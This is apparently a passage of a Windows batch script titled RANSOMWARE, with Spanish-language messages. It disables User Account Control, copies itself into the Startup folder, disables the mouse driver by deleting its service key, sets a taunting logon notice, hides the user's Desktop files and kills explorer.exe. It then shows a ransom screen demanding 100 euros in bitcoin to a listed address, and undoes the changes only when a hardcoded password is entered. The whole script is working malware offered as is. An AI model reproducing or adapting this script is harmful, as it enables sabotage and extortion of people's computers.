o off
REG ADD HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
copy Ransomware.bat "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
@Echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" /f
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "TE DIJE QUE NO APAGARAS EL PC" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "AHORA TE HE ROBADO EL MOUSE [PULSA BARRA ESPACIADORA O INTRO PARA CONTINUAR]" /f
@echo off
ATTRIB +H +S "C:\Users\%USERNAME%\Desktop\*" /S /D
echo on
color 0A
@echo off
title RANSOMWARE
taskkill /f /im explorer.exe
:bucle
cls
echo =================================================================================
echo LEE CON ATENCION
echo SI QUIERE RECUPERAR LA CUENTA!
echo =================================================================================
echo - No reiniciar este PC!.
echo - Al reiniciar se eliminara los datos del disco duro!.
echo - Si usted cierra esta ventana no podra recuperar el PC!.
echo - ENVIAR 100 Euros A esta direccion de BTC "35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh"
echo SI QUIERE OBTENER LA CLAVE!.
echo =================================================================================
echo - Le daremos la clave al recibir el dinero
echo =================================================================================
set /p pass= Escriba aqui el password:
if %pass%==BvMIb2OBLM4l8RUFCpn0i3C (goto passcorrecto) ELSE (goto bucle)
:passcorrecto
ATTRIB -H -S "C:\Users\%USERNAME%\Desktop\*" /S /D
cls
@echo off
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ImagePath" /t REG_EXPAND_SZ /d "\SystemRoot\System32\drivers\mouclass.sys" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Type" /t REG_DWORD /d "1" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Start" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ErrorControl" /t REG_DWORD /d "1" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "DisplayName" /t REG_SZ /d "@msmouse.inf,%%mouclass.SvcDesc%%;Controlador de clase de mouse" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Owners" /t REG_MULTI_SZ /d "oem7.inf\0oem6.inf\0termmou.inf\0msmouse.inf" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Group" /t REG_SZ /d "" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "0" /t REG_SZ /d "ACPI\VMW0003\4&1bd7f811&0" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "Count" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "NextInstance" /t REG_DWORD /d "3" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "1" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_00\8&367bfb7c&0&0000" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "2" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_01\8&12a4bdba&0&0000" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "" /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "" /f
cd "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
del Ransomware.bat
cls
echo Felicidades! La clave es correcta.
echo LEA ESTO!!!
echo ========================================================
echo Para volver a tener el mouse operativo, reinicie su pc
echo ========================================================
start explorer.exe
start explorer.exe
pause>nul
pause>nul
exit